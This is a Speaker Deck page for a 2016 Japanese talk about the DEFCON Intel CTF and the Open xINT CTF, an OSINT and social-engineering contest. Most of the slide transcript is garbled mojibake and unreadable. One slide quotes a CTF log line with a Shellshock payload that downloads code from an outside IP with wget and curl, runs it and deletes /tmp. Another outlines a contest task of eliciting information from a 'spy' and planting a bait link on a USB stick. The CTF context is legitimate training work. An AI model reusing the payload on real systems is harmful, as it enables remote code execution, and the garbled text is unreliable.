Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intel CTF and Open xINT CTF 20161220
Search
Yuho Kameda
December 20, 2016
Technology
1
1.1k
Intel CTF and Open xINT CTF 20161220
OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp
Yuho Kameda
December 20, 2016
Tweet
Share
More Decks by Yuho Kameda
See All by Yuho Kameda
How to use OWASP ZAP & Vulnerabilities Slikmap
ykame
0
8.8k
Enjoy Daily Life by handy tool
ykame
0
90
Find Trust-Information -Public- 20170630 #ssmjp
ykame
1
2.4k
Hey Siri! Hello Barbie! ssmjp
ykame
0
850
How to create the alert by script of ZAP
ykame
2
640
[bpstudy] OWASP ZAP Vulnerable Assesment.
ykame
2
1.3k
What is ZAP?
ykame
0
480
MINI Hardening #1.2 20分LT ZAPを使ったHardening対策術 2015/8/29
ykame
2
520
How to install VMwarePlayer and OWASP BWA
ykame
1
930
Other Decks in Technology
See All in Technology
JEP 480: Structured Concurrency
aya_ebata
0
130
PDF Viewer作成の今までとこれから
hunachi
0
400
突撃! 隣のAmazon Bedrockユーザー 〜YouはどうしてAWSで?〜
minorun365
PRO
3
380
AWS SAW を広めたい @四国クラウドお遍路
kazzpapa3
0
230
LLVM/ASMを使った有限体の高速実装
herumi
0
120
Creative UIs with Compose: DroidKaigi 2024
chrishorner
1
480
スタッフエンジニアの道: The Staff Engineer’s Path
snoozer05
PRO
44
14k
不動産tech Product Night#2_AIことはじめ_GA橋本
takehikohashimoto
0
180
不動産 x AIことはじめ~データの真価を拓くために
estie
0
110
React Aria で実現する次世代のアクセシビリティ
ryo_manba
4
1.2k
フロントエンド・オブザーバビリティを支える要素技術を学ぼう
sadnessojisan
2
180
Tricentisにおけるテスト自動化へのAI活用ご紹介/20240910Shunsuke Katakura
shift_evolve
0
180
Featured
See All Featured
Faster Mobile Websites
deanohume
304
30k
We Have a Design System, Now What?
morganepeng
48
7.1k
StorybookのUI Testing Handbookを読んだ
zakiyama
26
5.1k
Atom: Resistance is Futile
akmur
261
25k
Design by the Numbers
sachag
277
19k
Documentation Writing (for coders)
carmenintech
65
4.3k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Building Adaptive Systems
keathley
36
2.1k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
354
29k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
36
1.7k
Embracing the Ebb and Flow
colly
83
4.4k
The Illustrated Children's Guide to Kubernetes
chrisshort
47
48k
Transcript
OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz
ࣗݾհ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ༰
WebΞϓϦέʔγϣϯ੬ऑੑஅ ϓϥοτϑΥʔϜ੬ऑੑஅ SOC/CSIRTۀ ۓٸҊ݅ͳΜͰཁһ… ใऩू
ࠓ͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠
DEFCONͰIntel CTFʹ ࢀՃͨ͠
DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTFίϯςετ͕͋ΔϋοΧʔ ͷࡇయ
DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015͔Β࢝·ͬͨɺIntelligenceʹযΛͯͨ ڝٕ ୈ2ճ(2016)ͷςʔϚɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
͍ͯ͘͠աఔͰ༷ʑͳΛճ͢Δ ༏উۚ$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ12ҐͰͨ͠
Intel CTFͷ݁Ռ
ͲΜͳ͕͋ͬͨͷʔʁ 1 The Vuln: What is the vulnerability that was
successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ͑ʮBashdoorʯ
ͦͷଞͷ <Level1> ϚϧΣΞͷ௨৴ઌʁ ߈ܸݩIPͷASN(Autonomous System Number)ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯʁ <Level2> ϚϧΣΞͷ໊લʁ ༻͕ແޮԽ͞Ε͍ͯΔ໊ؔʁ
Ϙοτͷ໊લʁ Bot Harder͕༻Δ͢ΔMaildropʁ
ଞʹ͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀిͯ͠ใࡡऔ͢Δڝٕ Black Badge͑Δۄίϯςετ blog.yka.me Ͱɺ2015ͷใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠
AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!
Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔͷCTFຊͰΓ͍ͨͰ͢Ͷʯ ʮձࣾؔͩͱ༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00
Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖ 8/12 Call For Xఏग़done
࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩
Open xINT CTFͱʁ http://xintctf.wpblog.jp/ ձͰͷؔऀͷฉ͖ࠐΈSNSͳͲͰඞཁͳใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱͷεύΠཆίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)
߈ܸऀ(ϋοΧʔ) ৮ USB୳ࡧґཔ USBʹ᠘ΛࠐΜͰ৮ ಠࣗʹௐࠪ
7 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨεʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧϯτʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧϯτ ʁ
5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV TokyoͰ৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV TokyoͰʮϞϊʯΛͤ
͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰԠͷ͋ͬͨۙΛ୳͢
ৄ͘͠ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTFͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup
http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a
ࢀՃऀ : 93ਓ 1Ͱղ͚ͨਓ : 67ਓճ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:
28ਓɺ5: 7ਓ
࠷ऴతͳ݁Ռʁ (700Ҏ্) [߹ܭ + εύΠಘ + ࠷ऴճ࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900
+ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ໊ͱҰக͠ͳ͍ํεύΠಘ͕0ͱͳΓ·͢ ಉͷ߹ɺ࠷ऴճ͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢